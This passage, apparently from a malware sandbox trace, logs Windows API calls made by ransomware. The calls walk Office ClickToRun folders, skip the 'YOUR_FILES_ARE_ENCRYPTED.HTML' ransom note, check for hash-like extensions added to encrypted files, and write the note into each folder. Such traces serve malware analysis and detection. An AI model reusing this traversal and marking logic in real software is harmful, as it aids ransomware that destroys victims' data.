ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x38b5ce, dwReserved0=0x0, dwReserved1=0x60, cFileName="stream.x86.x-none.man.dat.7661DBF480A90BFF51B093232C90AFA3CA2A902200EA917B692DFC62223FF80A", cAlternateFileName="STREAM~1.766")) returned 1 [0169.594] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\stream.x86.x-none.man.dat.7661DBF480A90BFF51B093232C90AFA3CA2A902200EA917B692DFC62223FF80A") returned 181 [0169.594] lstrcmpW (lpString1="stream.x86.x-none.man.dat.7661DBF480A90BFF51B093232C90AFA3CA2A902200EA917B692DFC62223FF80A", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.594] PathFindExtensionW (pszPath="stream.x86.x-none.man.dat.7661DBF480A90BFF51B093232C90AFA3CA2A902200EA917B692DFC62223FF80A") returned=".7661DBF480A90BFF51B093232C90AFA3CA2A902200EA917B692DFC62223FF80A" [0169.594] lstrlenW (lpString=".7661DBF480A90BFF51B093232C90AFA3CA2A902200EA917B692DFC62223FF80A") returned 65 [0169.594] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcaddc120, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcaddc120, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcaddc120, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.594] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 120 [0169.594] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.594] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcaddc120, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcaddc120, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcaddc120, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.594] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0169.594] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 120 [0169.594] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\5df8e020-832f-493e-a40d-17a803c0d548\\x-none.16\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.594] GetProcessHeap () returned 0x270000 [0169.595] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0169.595] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcaddc120, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcaddc120, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcaddc120, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.595] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 110 [0169.595] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.595] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcaddc120, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcaddc120, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcaddc120, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.595] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0169.595] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 110 [0169.595] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\5df8e020-832f-493e-a40d-17a803c0d548\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.596] GetProcessHeap () returned 0x270000 [0169.596] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0169.596] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2fc83790, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2fc83790, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcae02280, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x7b6, dwReserved0=0x0, dwReserved1=0x60, cFileName="DeploymentConfig.0.xml.214D653AEC68B28435118E76B5EECC97FE729076E16536A3A4FE51245B9C7140", cAlternateFileName="DEPLOY~1.214")) returned 1 [0169.596] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml.214D653AEC68B28435118E76B5EECC97FE729076E16536A3A4FE51245B9C7140") returned 131 [0169.596] lstrcmpW (lpString1="DeploymentConfig.0.xml.214D653AEC68B28435118E76B5EECC97FE729076E16536A3A4FE51245B9C7140", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.596] PathFindExtensionW (pszPath="DeploymentConfig.0.xml.214D653AEC68B28435118E76B5EECC97FE729076E16536A3A4FE51245B9C7140") returned=".214D653AEC68B28435118E76B5EECC97FE729076E16536A3A4FE51245B9C7140" [0169.597] lstrlenW (lpString=".214D653AEC68B28435118E76B5EECC97FE729076E16536A3A4FE51245B9C7140") returned 65 [0169.597] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x96c2d3b0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x96c2d3b0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcae283e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x566, dwReserved0=0x0, dwReserved1=0x60, cFileName="DeploymentConfig.2.xml.D6A2249DDF8064329033C9A7BBBF3DF511643078853BA3AA136EBCF9A5E87D5C", cAlternateFileName="DEPLOY~1.D6A")) returned 1 [0169.597] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml.D6A2249DDF8064329033C9A7BBBF3DF511643078853BA3AA136EBCF9A5E87D5C") returned 131 [0169.597] lstrcmpW (lpString1="DeploymentConfig.2.xml.D6A2249DDF8064329033C9A7BBBF3DF511643078853BA3AA136EBCF9A5E87D5C", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.597] PathFindExtensionW (pszPath="DeploymentConfig.2.xml.D6A2249DDF8064329033C9A7BBBF3DF511643078853BA3AA136EBCF9A5E87D5C") returned=".D6A2249DDF8064329033C9A7BBBF3DF511643078853BA3AA136EBCF9A5E87D5C" [0169.597] lstrlenW (lpString=".D6A2249DDF8064329033C9A7BBBF3DF511643078853BA3AA136EBCF9A5E87D5C") returned 65 [0169.597] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2f454bf0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb2c4e80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb2c4e80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="MachineData", cAlternateFileName="MACHIN~1")) returned 1 [0169.597] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData") returned 55 [0169.597] GetProcessHeap () returned 0x270000 [0169.597] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0169.597] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData" [0169.597] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\*" [0169.597] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2f454bf0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb2c4e80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb2c4e80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0169.597] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2f454bf0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb2c4e80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb2c4e80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.597] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb29ed20, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb29ed20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Catalog", cAlternateFileName="")) returned 1 [0169.598] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog") returned 63 [0169.598] GetProcessHeap () returned 0x270000 [0169.598] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0169.598] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog" [0169.598] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\*" [0169.598] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb29ed20, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb29ed20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0169.598] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb29ed20, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb29ed20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.598] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb278bc0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb278bc0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Packages", cAlternateFileName="")) returned 1 [0169.598] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages") returned 72 [0169.598] GetProcessHeap () returned 0x270000 [0169.598] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0169.601] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages" [0169.601] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\*" [0169.601] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb278bc0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb278bc0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0169.602] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb278bc0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb278bc0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.602] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcb278bc0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcb278bc0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb29ed20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.602] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 102 [0169.602] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.602] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb278bc0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb278bc0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{9AC08E99-230B-47E8-9721-4577B7F124EA}", cAlternateFileName="{9AC08~1")) returned 1 [0169.602] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}") returned 111 [0169.602] GetProcessHeap () returned 0x270000 [0169.602] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0169.603] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}" [0169.603] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\*" [0169.603] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb278bc0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb278bc0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0169.603] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb278bc0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb278bc0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.603] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcb278bc0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcb278bc0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb278bc0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.603] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 141 [0169.603] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.603] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb278bc0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb278bc0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{1A8308C7-90D1-4200-B16E-646F163A08E8}", cAlternateFileName="{1A830~1")) returned 1 [0169.603] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}") returned 150 [0169.604] GetProcessHeap () returned 0x270000 [0169.604] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7690008 [0169.606] lstrcpyW (in: lpString1=0x7690008, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}" [0169.606] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\*" [0169.606] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\*", lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb278bc0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb278bc0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f32c0 [0169.606] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb278bc0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb278bc0, 